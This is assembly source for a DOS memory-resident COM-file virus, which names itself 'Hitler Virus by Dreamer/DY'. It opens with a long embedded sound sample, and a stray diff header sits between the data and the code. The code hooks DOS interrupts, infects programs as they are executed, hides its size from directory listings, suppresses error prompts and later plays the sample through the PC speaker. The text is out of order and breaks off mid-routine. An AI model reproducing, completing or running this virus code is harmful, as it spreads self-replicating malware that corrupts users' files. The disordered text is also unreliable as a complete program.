db 085h,080h,078h,07Dh,078h,07Fh,082h,087h,08Ch,078h,082h,081h,086h
db 082h,07Dh,081h,07Bh,074h,078h,084h,078h,084h,080h,07Eh,079h,075h
db 079h,072h,081h,07Dh,08Bh,07Eh,07Bh,086h,082h,086h,07Fh,07Eh,077h
db 076h,084h,07Eh,080h,074h,077h,07Fh,090h,08Ch,085h,07Ah,062h,06Ah
db 080h,08Ch,08Dh,07Eh,072h,07Bh,082h,089h,095h,08Ah,06Fh,07Ah,083h
db 082h,083h,07Bh,077h,07Ah,079h,082h,07Dh,06Eh,077h,06Eh,082h,07Eh
db 088h,07Dh,07Fh,078h,071h,081h,075h,07Ch,086h,07Fh,086h,07Eh,085h
db 081h,086h,087h,08Dh,08Ah,076h,07Ah,07Ah,086h,085h,08Ah,086h,085h
db 07Dh,077h,078h,06Eh,07Fh,07Ah,07Dh,07Eh,074h,083h,079h,088h,07Ah
db 084h,078h,073h,081h,079h,086h,083h,081h,07Fh,082h,094h,080h,080h
db 06Eh,069h,07Ch,078h,07Eh,07Bh,07Ch,072h,086h,090h,086h,07Dh,079h
db 07Eh,084h,08Bh,07Eh,080h,080h,072h,090h,088h,07Ch,079h,076h,07Bh
db 07Fh,086h,07Ah,081h,07Dh,07Dh,08Ah,07Ah,080h,070h,075h,07Eh,079h
db 085h,073h,076h,075h,087h,087h,088h,084h,07Ch,07Ah,076h,077h,07Bh
db 079h,083h,07Bh,081h,07Dh,07Ch,07Fh,080h,081h,07Fh,08Ah,082h,082h
db 08Ch,082h,086h,086h,08Ah,083h,080h,071h,073h,07Fh,077h,084h,087h
db 081h,07Bh,07Fh,07Fh,087h,086h,079h,083h,077h,087h,07Ch,07Ch,07Ch
db 075h,082h,071h,076h,07Ch,076h,079h,079h,082h,070h,080h,07Ah,081h
db 087h,084h,07Ah,070h,07Dh,06Fh,082h,084h,07Eh,081h,07Bh,07Dh,07Fh
db 08Fh,07Dh,07Ch,084h,07Eh,07Bh,086h,088h,07Eh,08Fh,089h,075h,08Ah
db 07Dh,079h,07Dh,080h,079h,07Fh,086h,077h,078h,07Dh,06Eh,08Dh,07Fh
db 074h,076h,07Eh,078h,078h,08Dh,079h,07Eh,082h,07Eh,080h,087h,079h
db 076h,082h,074h,07Eh,081h,06Eh,074h,081h,082h,081h,092h,07Bh,07Fh
db 08Fh,08Ah,08Bh,07Ch,070h,074h,08Fh,07Eh,084h,084h,06Fh,075h,07Ah
db 08Eh,07Bh,07Ch,078h,078h,083h,086h,08Eh,07Eh,082h,070h,07Dh,08Dh
db 078h,07Bh,06Fh,077h,076h,087h,085h,074h,079h,077h,07Dh,085h,084h
db 06Bh,07Eh,07Eh,077h,086h,088h,079h,07Dh,091h,07Bh,081h,09Bh,073h
db 080h,07Bh,07Bh,090h,084h,070h,07Bh,08Ah,078h,07Fh,081h,071h,07Fh
db 082h,080h,074h,081h,07Bh,06Dh,07Fh,070h,078h,089h,07Ch,077h,089h
db 08Ah,07Fh,086h,07Eh,072h,081h,073h,068h,07Fh,082h,073h,085h,08Ah
db 086h,09Eh,093h,07Bh,081h,086h,069h,07Dh,086h,06Ch,07Fh,088h,088h
db 08Fh,09Ch,08Ch,079h,086h,074h,067h,06Dh,064h,069h,077h,07Fh,084h
db 09Fh,085h,08Dh,09Bh,074h,071h,06Ch,05Dh,062h,07Dh,06Dh,073h,086h
db 090h,091h,097h,092h,07Ah,079h,07Ch,061h,06Dh,076h,073h,070h,088h
db 090h,094h,09Bh,09Bh,094h,078h,077h,078h,060h,05Dh,069h,07Bh,087h
db 090h,09Fh,09Dh,09Fh,0A1h,080h,076h,068h,053h,04Bh,066h,072h,072h
db 086h,099h,097h,0A2h,0ADh,082h,06Ah,064h,05Ah,053h,061h,06Ah,067h
db 08Ah,0ABh,0ADh,0ACh,09Bh,0A5h,060h,067h,066h,059h,056h,06Fh,093h
db 08Fh,0BFh,0A8h,08Eh,0AFh,0AAh,044h,04Fh,070h,041h,057h,08Dh,084h
db 07Dh,0D1h,094h,07Eh,0BEh,088h,02Dh,06Ah,070h,038h,07Bh,0ABh,063h
db 0AFh,0A0h,068h,075h,0CDh,064h,013h,087h,068h,02Fh,0ABh,0B4h,037h
db 097h,0E0h,050h,097h,0F8h,022h,063h,0D4h,02Ah,07Dh,0E6h,038h,02Fh
db 0F9h,080h,047h,0E7h,0DAh,010h,07Fh,084h,034h,0B7h,0B0h,01Dh,035h
db 0D7h,0C0h,04Fh,0A1h,0B2h,002h,06Fh,0DEh,014h,087h,040h,001h,077h
db 0FFh,0A0h,032h,0BDh,0E2h,05Bh,0D7h,0C0h,000h,095h,02Ah,000h,0A7h
db 0C8h,02Ch,057h,0AEh,0C4h,09Fh,0E2h,030h,03Bh,0DCh,04Ah,02Fh,0FCh
db 084h,03Ah,0A5h,0D3h,094h,0BBh,0D8h,020h,07Fh,0A0h,018h,033h,0FFh
db 06Ch,009h,0A7h,0E2h,03Ah,0AFh,08Ah,000h,087h,068h,020h,09Fh,0D0h
db 040h,05Bh,0FFh,088h,03Fh,0D5h,01Ch,027h,0A0h,036h,04Fh,0FFh,0A8h
db 042h,0EFh,0D0h,05Eh,0F3h,0A0h,000h,05Bh,045h,03Dh,0F5h,0B4h,01Eh
db 057h,0FFh,060h,087h,0DCh,000h,007h,084h,04Ch,07Dh,0FFh,071h,02Dh
db 0FFh,0C4h,037h,0CFh,064h,000h,06Fh,038h,03Dh,0FFh,0C0h,034h,09Bh
db 0FFh,054h,0A3h,0C2h,000h,05Fh,050h,01Ah,09Fh,0FFh,050h,03Fh,0FFh
db 08Ch,073h,0F7h,034h,000h,07Ah,048h,073h,0FFh,080h,029h,0EFh,0D8h
db 02Eh,0ABh,068h,000h,08Dh,036h,028h,0F3h,0D8h,044h,08Fh,0FFh,04Ah
db 0AFh,0DAh,000h,02Bh,030h,03Fh,0D3h,0E8h,05Ah,07Fh,0FFh,068h,097h
db 0E2h,000h,00Bh,021h,03Fh,0A7h,0FFh,06Ch,063h,0FFh,078h,073h,0DFh
db 050h,000h,000h,04Dh,09Fh,0FFh,082h,033h,0E7h,0C0h,059h,0AFh,098h
db 000h,02Bh,03Fh,062h,0F1h,0A6h,073h,0DFh,0FFh,040h,08Bh,0D0h,000h
db 000h,017h,05Fh,0FDh,0FFh,058h,08Fh,0FFh,06Dh,0B7h,0ECh,008h,000h
db 027h,07Bh,0C6h,0D2h,075h,097h,0FFh,060h,076h,0C8h,018h,000h,000h
db 065h,0AFh,0FFh,096h,073h,0FFh,088h,07Fh,0DAh,040h,000h,000h,07Bh
db 09Fh,0E0h,082h,069h,0FFh,0D4h,05Fh,066h,080h,000h,027h,049h,062h
db 09Dh,0AAh,099h,0FFh,0F8h,038h,096h,0D4h,000h,000h,027h,077h,0FFh
db 0FCh,068h,09Fh,0FFh,065h,0AFh,0D8h,000h,000h,02Fh,09Ah,07Fh,088h
db 06Dh,0CFh,0FFh,062h,06Dh,0B1h,028h,000h,019h,065h,0BFh,0F4h,062h
db 08Bh,0FFh,084h,077h,0EBh,054h,000h,000h,05Dh,0AFh,0FFh,08Ah,057h
db 0FFh,068h,069h,0ABh,084h,000h,000h,065h,099h,0FFh,09Ch,05Bh,0EFh
db 0E4h,09Dh,093h,09Ah,000h,000h,07Fh,093h,08Eh,089h,06Ch,0E5h,0FFh
db 05Dh,074h,0CFh,038h,000h,023h,079h,09Bh,0DEh,091h,0AFh,0FFh,05Ch
db 073h,0A7h,084h,000h,000h,046h,09Fh,0FFh,080h,053h,0DFh,0E4h,077h
db 08Ah,0B8h,000h,000h,06Bh,089h,0A4h,084h,085h,0BFh,0FFh,050h,02Bh
db 0C7h,068h,000h,00Fh,055h,0B5h,0FFh,0D0h,014h,0CFh,084h,059h,0DDh
db 0C0h,000h,000h,08Fh,0B6h,0CBh,09Ah,050h,0D7h,0FFh,026h,055h,0A2h
db 008h,000h,03Bh,06Ch,08Ah,0D3h,094h,083h,0FFh,082h,091h,0E7h,060h
db 000h,00Ch,095h,082h,09Ch,0B3h,07Ah,0E7h,0FEh,028h,059h,0D7h,058h
db 000h,001h,03Fh,0BFh,0FFh,078h,063h,0FFh,086h,0B3h,0FFh,040h,000h
db 000h,06Dh,08Fh,0D9h,0A1h,060h,0B3h,0D2h,0C7h,074h,048h,000h,045h
db 04Bh,03Bh,097h,0B8h,0A2h,0D3h,0FFh,064h,071h,0CEh,004h,00Bh,01Bh
db 052h,07Bh,0C1h,0F6h,0A4h,0C5h,0C0h,065h,072h,0C6h,000h,000h,00Ah
db 03Fh,0DFh,0FFh,058h,06Bh,0FAh,044h,0A7h,0FFh,028h,000h,03Bh,0BDh
db 0FAh,0FFh,088h,07Bh,0FFh,058h,062h,057h,060h,000h,000h,043h,08Bh
db 0FFh,098h,06Ah,0E7h,0D0h,062h,08Ah,0B0h,000h,005h,05Fh,0B5h,0B2h
db 0A4h,072h,0D7h,0FFh,038h,087h,088h,01Ch,027h,053h,06Ah,09Dh,0FFh
db 070h,075h,0FDh,048h,063h,0C5h,080h,000h,015h,06Bh,0B7h,0FFh,084h
db 048h,0A7h,0E0h,061h,0B3h,088h,000h,031h,03Eh,062h,09Bh,0ECh,058h
db 05Bh,0FFh,054h,06Bh,0B5h,0A0h,000h,000h,061h,091h,0FFh,090h,043h
db 0EFh,0B8h,09Ah,09Fh,0A8h,000h,027h,031h,05Bh,09Ch,0BAh,0B0h,0BFh
db 0F5h,04Ah,07Fh,0E5h,042h,000h,000h,056h,0BBh,0FFh,090h,03Fh,0FFh
db 090h,0BFh,0D7h,094h,000h,000h,05Fh,08Eh,0FFh,080h,04Eh,0A5h,0D8h
db 07Fh,064h,094h,000h,000h,03Bh,088h,074h,068h,0BFh,0FBh,0FFh,04Ah
db 05Fh,0A5h,092h,015h,000h,01Fh,07Bh,0FFh,0FFh,052h,0DFh,050h,09Fh
db 0D3h,0C0h,000h,000h,053h,08Dh,0FFh,098h,036h,087h,0D4h,08Bh,06Dh
db 0B4h,000h,000h,035h,07Dh,0CBh,0F8h,0BAh,074h,0FFh,078h,075h,09Ah
db 050h,000h,000h,0AEh,082h,073h,0A6h,0B0h,0FFh,0C8h,03Bh,052h,099h
db 032h,000h,023h,044h,07Fh,0FFh,0FFh,058h,087h,046h,07Bh,0F3h,0CAh
db 000h,000h,05Fh,0CAh,0FFh,0FEh,024h,077h,0B8h,039h,076h,0B4h,00Eh
db 000h,02Bh,08Eh,0ABh,0FFh,070h,063h,0FFh,080h,09Ch,0BBh,054h,000h
db 00Fh,06Ah,0A5h,0D6h,09Ah,099h,0DDh,0D4h,056h,067h,094h,000h,000h
db 01Dh,066h,0BBh,0FFh,070h,067h,0D0h,06Fh,096h,0DEh,048h,000h,036h
db 06Fh,09Ah,0FFh,070h,027h,0C9h,056h,06Ch,08Fh,084h,000h,023h,057h
db 086h,0FFh,0F4h,080h,04Fh,0F5h,06Eh,082h,0C9h,020h,000h,003h,05Bh
db 099h,0FFh,0C0h,03Ch,0EBh,080h,08Fh,09Dh,0A8h,006h,00Eh,056h,077h
db 0DFh,0FFh,060h,07Fh,0B0h,06Eh,062h,0CEh,01Ah,017h,047h,05Dh,085h
db 0FFh,0FFh,040h,097h,05Ah,05Eh,06Fh,0B4h,000h,037h,050h,07Fh,0ABh
db 0FFh,0D8h,000h,0A7h,040h,047h,07Fh,08Ch,01Ch,023h,06Dh,080h,0C7h
db 0FFh,080h,019h,0D2h,030h,056h,09Fh,070h,018h,02Dh,086h,0A8h,0FFh
db 0FFh,070h,08Fh,0A0h,03Ch,018h,09Fh,070h,00Ah,053h,095h,099h,0FFh
db 0FFh,044h,08Bh,088h,02Dh,00Fh,0ADh,044h,006h,067h,0A2h,085h,0EBh
db 0FFh,030h,04Fh,094h,013h,000h,0BBh,035h,037h,083h,08Ch,093h,0FFh
db 0FFh,040h,06Dh,0A8h,023h,027h,0AFh,034h,047h,072h,092h,07Fh,0EBh
db 0FFh,054h,04Bh,0C0h,039h,044h,09Dh,054h,055h,075h,0C6h,084h,096h
db 0FFh,0A0h,033h,0BFh,04Ch,02Ch,056h,08Ah,055h,087h,0B3h,062h,051h
db 0C7h,0DCh,02Eh,08Fh,094h,020h,02Ah,07Dh,06Eh,0BDh,0ACh,06Ch,04Ch
db 0A3h,0FFh,080h,03Eh,0B3h,030h,02Ah,04Dh,08Eh,04Dh,095h,0A3h,06Ch
db 057h,0AFh,0FFh,060h,05Bh,0D5h,032h,04Fh,06Fh,064h,05Eh,0CDh,0A0h
db 03Ah,06Fh,0CDh,0C0h,04Ah,082h,0DBh,02Ch,06Dh,04Bh,04Eh,087h,0B8h
db 06Bh,058h,07Fh,09Eh,0CCh,072h,073h,0D5h,030h,06Fh,067h,048h,05Bh
db 0BAh,09Ch,058h,07Dh,099h,0D4h,094h,06Ch,0C3h,04Ch,079h,03Eh,025h
db 06Bh,0D4h,078h,072h,07Bh,07Ah,0BBh,0C1h,04Ah,08Bh,088h,02Bh,058h
db 034h,046h,0DDh,09Ah,080h,072h,06Ch,08Fh,0FFh,070h,013h,0B1h,030h
db 086h,055h,05Fh,0C7h,0B4h,082h,075h,087h,08Dh,0FFh,078h,000h,0A7h
db 058h,07Bh,070h,03Ah,05Bh,0BCh,08Eh,0A8h,0ACh,034h,08Fh,0D8h,028h
db 05Bh,0E0h,028h,07Fh,059h,029h,0ABh,0CCh,064h,06Bh,080h,049h,0AFh
db 0D0h,023h,07Fh,0B0h,00Eh,089h,061h,02Fh,0B7h,0B2h,070h,092h,088h
db 06Fh,0EFh,090h,023h,09Bh,0B4h,035h,08Ch,03Dh,03Fh,0D3h,094h,08Bh
db 0C7h,060h,03Bh,0B9h,082h,069h,0CFh,0A0h,027h,084h,02Ah,04Bh,0EFh
db 08Ch,07Eh,08Ch,050h,05Fh,0E3h,079h,04Fh,0AFh,078h,01Bh,081h,02Ch
db 03Dh,0D3h,078h,077h,0B3h,066h,055h,0BFh,082h,069h,0B2h,0A8h,025h
db 08Ah,035h,043h,0D3h,09Ch,07Bh,09Bh,05Ah,03Dh,0AFh,0C6h,07Fh,077h
db 07Fh,062h,06Ah,096h,05Dh,073h,0AAh,06Ah,08Ch,08Ah,054h,04Fh,08Eh
db 0AAh,07Bh,06Fh,09Ch,070h,05Dh,084h,056h,07Fh,0C5h,085h,073h,060h
db 05Ah,071h,0C3h,0A8h,050h,056h,064h,071h,087h,0ACh,04Bh,071h,088h
db 074h,0A4h,08Bh,085h,069h,072h,0A9h,090h,067h,07Ch,0A8h,038h,07Fh
db 088h,05Bh,07Fh,0A5h,06Ah,073h,0B9h,05Bh,056h,0B2h,05Ah,042h,0A2h
db 0CCh,044h,037h,079h,055h,073h,0E2h,0A5h,06Bh,091h,062h,056h,0B7h
db 0ACh,051h,05Fh,0A1h,090h,02Eh,0A3h,07Eh,045h,09Fh,0A2h,07Ch,095h
db 08Ah,070h,067h,0AEh,074h,055h,0A7h,0DBh,018h,033h,066h,06Ch,07Bh
db 0C3h,090h,049h,07Dh,093h,076h,0B3h,0B0h,041h,046h,0A3h,08Dh,02Ah
db 08Fh,075h,046h,087h,0B2h,07Bh,07Eh,091h,06Eh,071h,09Fh,08Ah,069h
db 070h,092h,08Ah,04Fh,096h,090h,056h,07Dh,090h,084h,07Dh,0A1h,086h
db 066h,084h,08Bh,073h,081h,080h,084h,072h,089h,082h,06Bh,06Eh,07Fh
db 080h,077h,079h,095h,091h,059h,059h,081h,070h,069h,08Bh,08Eh,088h
db 059h,07Ch,06Dh,097h,083h,06Eh,07Fh,087h,093h,087h,078h,05Ch,078h
db 098h,07Eh,077h,08Fh,097h,062h,067h,080h,066h,07Eh,0A1h,07Ah,07Dh
db 089h,095h,078h,055h,073h,092h,08Ch,077h,07Dh,096h,092h,04Ah,05Fh
db 06Eh,087h,092h,08Ch,082h,085h,092h,078h,058h,06Ch,092h,073h,073h
db 086h,08Eh,07Fh,05Eh,04Ah,06Ch,073h,092h,0A0h,07Eh,090h,097h,08Bh
db 073h,070h,078h,089h,089h,075h,079h,08Fh,08Eh,07Ah,040h,05Fh,07Ch
db 086h,085h,0A2h,0A9h,084h,07Fh,075h,05Ch,073h,09Ch,076h,061h,07Fh
db 079h,075h,092h,082h,031h,069h,086h,076h,09Fh,0B1h,07Eh,073h,092h
db 06Bh,067h,097h,087h,074h,078h,07Ah,085h,099h,065h,067h,088h,054h
db 069h,085h,084h,087h,0A3h,08Ch,078h,09Fh,086h,053h,067h,07Ch,068h
db 075h,092h,078h,072h,07Ch,062h,07Dh,0AFh,090h,06Bh,07Ch,06Eh,068h
db 08Fh,0A0h,078h,06Ah,072h,075h,08Dh,08Ch,07Eh,089h,072h,054h,072h
db 08Bh,089h,07Fh,072h,06Bh,08Ah,0A2h,089h,08Fh,085h,066h,071h,093h
db 088h,074h,078h,06Dh,070h,08Ah,088h,089h,08Dh,072h,06Bh,080h,078h
db 079h,070h,069h,06Ch,07Ch,08Bh,082h,08Bh,078h,06Ah,087h,081h,07Eh
db 08Eh,070h,05Fh,079h,085h,07Fh,087h,07Ah,05Fh,08Ah,0A4h,076h,079h
db 080h,06Ah,069h,075h,07Eh,093h,0A5h,081h,072h,088h,088h,085h,090h
db 078h,060h,071h,07Bh,07Fh,084h,07Ah,068h,07Ah,08Ch,07Fh,07Ah,070h
db 068h,076h,07Ch,077h,093h,0A2h,080h,086h,07Dh,07Bh,083h,08Eh,068h
db 064h,074h,06Eh,077h,097h,074h,068h,080h,080h,071h,08Bh,07Ch,059h
db 079h,08Ah,074h,099h,09Ch,066h,07Fh,0A6h,07Fh,08Fh,0A0h,056h,06Dh
db 0A2h,06Ch,07Dh,09Dh,060h,05Fh,098h,072h,063h,097h,088h,048h,07Dh
db 085h,069h,0A3h,088h,04Eh,063h,09Fh,091h,077h,08Ch,074h,042h,085h
db 09Ch,06Ch,095h,066h,051h,08Fh,0CFh,07Ah,073h,09Ah,080h,065h,097h
db 080h,05Ah,081h,04Ch,04Ah,09Eh,09Ch,074h,07Fh,083h,086h,097h,09Ah
db 069h,07Fh,08Ch,060h,06Fh,0A0h,077h,06Eh,08Ch,08Eh,07Dh,083h,083h
db 064h,07Ah,074h,05Eh,079h,09Fh,07Ah,063h,083h,092h,069h,091h,088h
db 052h,075h,070h,069h,08Fh,0A0h,06Bh,074h,0ABh,08Eh,062h,08Dh,066h
db 063h,08Ah,071h,07Bh,0BBh,098h,068h,087h,0A4h,077h,097h,08Ch,044h
db 056h,069h,071h,0A7h,094h,05Dh,05Eh,0A4h,07Ch,077h,08Eh,05Ch,04Dh
db 07Eh,074h,07Bh,0ACh,078h,059h,0A3h,0A4h,060h,082h,084h,049h,075h
db 081h,07Eh,0ADh,0A5h,071h,07Fh,0BAh,074h,071h,084h,04Ah,05Bh,073h
db 071h,087h,0ADh,07Ch,062h,0ADh,093h,073h,097h,06Ah,03Fh,070h,077h
db 07Bh,0B5h,088h,058h,08Bh,0A8h,061h,079h,080h,045h,06Eh,075h,071h
db 09Bh,0B2h,072h,06Bh,0B0h,080h,078h,096h,061h,042h,05Fh,073h,08Dh
db 0B4h,088h,068h,0A3h,096h,06Fh,08Dh,07Ch,04Ah,05Eh,06Ch,07Fh,0BBh
db 0A0h,070h,08Fh,0B0h,07Eh,07Fh,08Ah,040h,030h,063h,086h,0AFh,0ACh
db 066h,063h,0B3h,080h,07Ch,07Eh,04Ch,03Fh,059h,079h,096h,09Bh,084h
db 077h,0ADh,090h,071h,085h,080h,03Eh,041h,073h,093h,0D3h,0B2h,076h
db 091h,09Ah,083h,0A3h,090h,040h,038h,05Bh,08Ah,0A7h,088h,071h,086h
db 090h,06Bh,07Eh,083h,052h,043h,057h,08Bh,0BBh,0C0h,080h,07Fh,0AAh
db 068h,07Bh,094h,050h,030h,048h,076h,09Dh,0A6h,07Dh,072h,0A7h,07Ah
db 069h,07Ah,07Dh,054h,065h,06Ch,085h,0A9h,0AAh,095h,0B2h,09Ch,059h
db 089h,0A1h,04Ch,049h,060h,07Eh,0C3h,0C0h,080h,083h,0A9h,067h,07Bh
db 08Dh,060h,03Ch,05Ah,085h,081h,07Eh,079h,08Dh,0B3h,060h,05Bh,07Bh
db 064h,03Dh,053h,06Ch,093h,0B5h,090h,08Ah,0BBh,07Ah,06Fh,08Fh,076h
db 046h,05Fh,070h,087h,0B3h,08Ch,07Ch,0AEh,078h,059h,085h,07Eh,048h
db 050h,07Bh,09Dh,0C1h,0A1h,08Fh,09Fh,098h,073h,085h,07Ch,048h,055h
db 07Ah,083h,083h,08Bh,08Bh,0A0h,0A8h,068h,06Fh,087h,05Eh,04Ah,061h
db 083h,095h,0A1h,090h,08Fh,0A8h,068h,067h,07Fh,062h,03Ah,056h,06Eh
db 097h,0B3h,087h,076h,09Fh,096h,06Ah,083h,080h,043h,056h,07Eh,088h
db 087h,08Fh,090h,0ADh,0B4h,060h,066h,08Dh,06Dh,044h,05Ch,075h,096h
db 0CAh,08Ch,063h,098h,071h,079h,087h,078h,044h,04Bh,083h,097h,09Bh
db 08Ah,07Ch,09Eh,0ACh,061h,05Fh,07Fh,062h,04Ah,067h,08Ah,095h,0BBh
db 098h,08Ch,0BDh,084h,085h,091h,06Ch,045h,059h,085h,08Bh,095h,08Bh
db 083h,0A4h,08Ch,04Dh,06Ah,08Bh,060h,048h,05Eh,07Fh,0ADh,0CCh,07Ch
db 068h,09Ch,064h,083h,089h,054h,036h,04Fh,07Dh,096h,0AFh,088h,072h
db 086h,0A0h,08Bh,074h,05Bh,04Dh,073h,078h,087h,09Eh,09Dh,092h,0A5h
db 0BCh,076h,07Bh,085h,059h,055h,06Ch,081h,093h,0A7h,0A1h,07Bh,07Ch
db 084h,06Dh,07Ch,07Bh,042h,039h,057h,07Dh,0C5h,0ACh,05Ah,071h,092h
db 06Ah,08Ah,09Fh,061h,046h,06Eh,099h,0BBh,0ABh,076h,073h,0A4h,068h
db 069h,06Fh,061h,036h,04Dh,07Bh,09Fh,0D1h,0A2h,081h,0B2h,098h,07Eh
db 093h,086h,04Bh,04Dh,077h,08Dh,0A7h,092h,07Ah,09Dh,0A0h,057h,072h
db 07Ah,05Ch,063h,065h,06Fh,09Fh,0CDh,08Dh,074h,09Ch,060h,063h,089h
db 070h,035h,046h,070h,095h,0C6h,090h,061h,085h,094h,06Ah,07Fh,07Eh
db 04Ah,05Ch,066h,076h,0A5h,0BAh,090h,087h,0BAh,082h,07Eh,095h,086h
db 04Ch,054h,07Dh,09Eh,0C9h,0A0h,06Ch,093h,086h,065h,073h,078h,03Dh
db 058h,065h,06Fh,08Ah,0AAh,090h,094h,0A1h,055h,062h,08Bh,068h,03Eh
db 04Ch,06Ch,09Bh,0D8h,090h,06Eh,0ACh,086h,07Dh,092h,076h,044h,052h
db 073h,089h,0B9h,096h,06Eh,08Dh,0A2h,065h,06Dh,084h,04Ah,05Dh,079h
db 090h,085h,094h,0ADh,0BBh,0C4h,066h,062h,083h,08Eh,056h,054h,068h
db 07Bh,0BFh,0BCh,070h,082h,063h,06Eh,08Dh,085h,040h,04Ah,069h,085h
db 0BDh,090h,05Ch,075h,09Ah,073h,07Bh,088h,050h,053h,074h,087h,097h
db 0ADh,08Eh,085h,0B3h,080h,073h,07Bh,076h,048h,059h,098h,092h,088h
db 08Ch,099h,0B6h,0A8h,05Bh,064h,081h,05Ch,050h,058h,066h,085h,0BFh
db 0A6h,072h,082h,057h,077h,0A5h,07Ch,04Dh,062h,07Bh,092h,0CAh,088h
db 054h,095h,080h,069h,07Bh,080h,04Ch,059h,07Ah,092h,0B5h,0B0h,079h
db 08Dh,09Ah,07Fh,07Fh,084h,057h,056h,076h,091h,09Fh,0A2h,088h,08Ah
db 0A5h,06Ah,06Dh,075h,05Ch,049h,062h,079h,087h,0BEh,099h,066h,08Eh
db 076h,07Eh,08Bh,074h,04Dh,05Bh,077h,089h,0AFh,0A0h,061h,07Bh,082h
db 065h,077h,08Eh,068h,068h,073h,08Eh,0A6h,0CAh,08Dh,065h,087h,08Bh
db 084h,076h,07Ch,054h,063h,075h,08Ah,0ADh,0B5h,078h,077h,093h,06Fh
db 07Bh,086h,060h,05Dh,068h,07Ah,093h,0C5h,08Ch,055h,083h,069h,071h
db 076h,072h,056h,05Ch,06Bh,081h,0ADh,0C4h,080h,067h,07Ah,061h,077h
db 096h,07Ah,072h,06Dh,07Eh,095h,0C2h,0B8h,064h,06Fh,072h,069h,078h
db 09Ah,078h,06Eh,073h,087h,0A7h,0CEh,098h,050h,07Eh,073h,074h,07Dh
db 088h,062h,066h,07Fh,091h,09Fh,0C3h,080h,058h,07Eh,060h,065h,081h
db 078h,057h,05Fh,088h,08Ch,0A0h,0B5h,076h,057h,070h,058h,070h,094h
db 075h,05Ch,077h,09Ch,08Ah,0A3h,0B8h,068h,05Fh,08Ch,06Dh,06Ah,095h
db 07Bh,06Bh,085h,093h,08Ah,0AFh,0B0h,064h,05Fh,08Fh,063h,069h,08Fh
db 067h,063h,07Dh,08Ah,082h,0A9h,0A8h,05Eh,05Dh,08Ah,060h,06Ah,089h
db 074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah
db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h,
slutt: ; DREAMER has a weird sense of humor
size equ $-100h
pgf equ ($+16)/16
@@ -0,0 +1,701 @@
call rakett
old db !­'
rakett: pop bp
push bp
add bp,-103h
mov ax,42ABh
int 21h
jnc failed
cli
mov ax,3521h
int 21h
mov w [bp+offset old21],bx
mov w [bp+offset old21+2],es
mov al,1Ch
int 21h
cli
mov w [bp+offset old1C],bx
mov w [bp+offset old1C+2],es
mov w [bp+offset teller],16380
sti
call normalspeed
mov si,ds
std
lodsb
cld
mov ds,si
xor bx,bx
mov cx,pgf
cmp b [bx],'Z'
jne failed
mov ax,[bx+3]
sub ax,cx
jc failed
mov [bx+3],ax
sub [bx+12h],cx
mov es,[bx+12h]
push cs
pop ds
mov di,100h
mov si,bp
add si,di
mov cx,size
rep movsb
push es
pop ds
mov ax,2521h
mov dx,offset ni21
int 21h
mov al,1Ch
mov dx,offset ni1C
int 21h
failed: push cs
push cs
pop ds
pop es
pop si
mov di,100h
push di
movsw
movsw
movsb
mov cx,0FFh
mov si,100h
ret
findFCB: popf
call int21
pushf
or al,al
jnz backFCB
call stealth
backFCB: popf
iret
stealth: push ax
push bx
push dx
push es
mov ah,2Fh
call int21
cmp byte es:[bx],0FFh
jne normFCB
add bx,8
normFCB: mov al,byte es:[bx+16h]
and al,31
xor al,31
jnz shitFCB
mov ax,word es:[bx+1Ch]
mov dx,word es:[bx+1Ch+2]
sub ax,size
sbb dx,0
jc shitFCB
mov word es:[bx+1Ch],ax
mov word es:[bx+1Ch+2],dx
shitFCB:
pop es
pop dx
pop bx
pop ax
ret
ni21: pushf
cmp ah,11h
je findFCB
cmp ah,12h
je findFCB
cmp ax,42ABh
jne not_42AB
popf
clc
retf 2
not_42AB:
cmp ax,4B00h
jne not_4B00
call install_24
push ax
push bx
push cx
push dx
push ds
push bp
mov ax,4300h
call int21
jc back1
mov cs:old_attr,cx
test cl,4
jnz back1
mov ax,4301h
xor cx,cx
call int21
jc back1
push dx
push ds
call infect
pop ds
pop dx
mov ax,4301h
db 0B9h ;mov CX,...
old_attr dw 0
call int21
back1: ;go here if the attrib-get fails
pop bp
pop ds
pop dx
pop cx
pop bx
pop ax
call remove_24
not_4B00:
back: popf
db 0EAh
old21 dw 0,0
int21: pushf
call dword ptr cs:old21
ret
infect: mov ax,3D02h
call int21
jnc okay_open
bad1: ret
okay_open: xchg bx,ax
mov ax,5700h
call int21
push cx
mov bp,sp
push dx
mov ah,3Fh
mov cx,5
mov dx,offset old
push cs
pop ds
call int21
jc close
cmp al,5
jne close
cmp word old[0],'MZ'
je close
cmp word old[0],'ZM'
je close
cmp old[0],0E9h
jne infect1
cmp word old[3],'­!'
jne infect1
close: pop dx
pop cx
mov ax,5701h
call int21
mov ah,3Eh
call int21
ret
infect1: mov ax,4202h
xor cx,cx
xor dx,dx
call int21
or dx,dx
jnz close
cmp ax,59000
jae close
dec ax
dec ax
dec ax
mov word ptr putjmp[1],ax
mov ah,40h
mov cx,size
mov dx,100h
call int21
jc close
cmp ax,size
jne close
mov ax,4200h
xor cx,cx
xor dx,dx
call int21
mov ah,40h
mov cx,5
mov dx,offset putjmp
call int21
or byte ss:[bp],31
jmp close
putjmp db 0E9h
dw 0
db '!­'
install_24: pushf
cli
push bx
push ds
xor bx,bx
mov ds,bx
push ds
lds bx,[24h*4]
mov cs:old24[0],bx
mov cs:old24[2],ds
pop ds
mov word [(24h*4)],offset ni24
mov [(24h*4)+2],cs
pop ds
pop bx
sti
popf
ret
remove_24: pushf
cli
push bx
push es
push ds
xor bx,bx
mov ds,bx
les bx,cs:old24[0]
mov [(24h*4)],bx
mov [(24h*4)+2],es
pop ds
pop es
pop bx
sti
popf
ret
errflag db 0
db 'Hitler Virus by Dreamer/DY',0
ni24: mov al,3
mov cs:errflag,1
iret
old24 dw 0,0
xofs dw offset sample
len equ 4131
divisor equ 230
teller dw 16380
ni1C:
cli
pushf
push ax
push ds
push si
push cs
pop ds
cmp teller,0
je teller_ok
dec teller
jmp noreset
teller_ok:
mov al,34h
db 0E6h,43h ;out 43h,al
mov al,divisor
db 0E6h,40h ;out 40h,al
mov al,0
db 0E6h,40h ;out 40h,al
mov al,090h
db 0E6h,43h ;out 43h,al
mov si,xofs
lodsb
db 0E6h,42h ;out 42h,al
db 0E4h,61h ;in al,61h
or al,3
db 0E6h,61h ;out al,61h
inc xofs
cmp xofs,len+offset sample
jb noreset
mov xofs,offset sample
noreset:
sti
pop si
pop ds
pop ax
popf
db 0EAh
old1C dw 0,0
normalspeed: cli
push ax
mov al,34h
db 0E6h,43h
mov al,0
db 0E6h,40h
